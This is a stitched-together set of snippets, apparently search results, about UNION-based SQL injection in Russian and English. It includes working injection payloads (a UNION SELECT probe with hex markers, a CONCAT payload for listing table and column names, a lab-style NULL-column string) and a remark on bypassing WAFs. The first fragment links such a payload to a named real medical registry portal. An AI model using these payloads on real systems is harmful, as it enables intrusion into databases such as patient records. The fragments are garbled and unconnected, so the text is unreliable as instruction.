... 1. - Войти на портал registratura.med.kg ... union all select (select concat(0x41653157,(select mid((select (elt(2836=2836,1))),1,10)),0x45784179)),null -- - ...
Select cast ('365' as int); можно записать менее громоздко
An SQL Injection attack can successfully bypass the WAF , and be conducted in all following cases: • Vulnerabilities in the functions of WAF request normalization. •
concatenate tablename and columnname in the same part of the injection using the keyword CONCAT: 1 UNION SELECT 1,concat(table_name,':', column_name),3...
MySQL server version for the right syntax to use near 'UNION DISTINCT (SELECT DISTINCT a.id FROM accounts at line 1.
It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use. So let's get started.
Try replacing each null with the random value provided by the lab, for example: '+UNION+SELECT+'abcdef',NULL,NULL
Here's all you need to know about Union-based SQL Injection.
There is a function called concat() that allows me to join the two columns and display on the page. Also I will be using semicolon) in the hex form.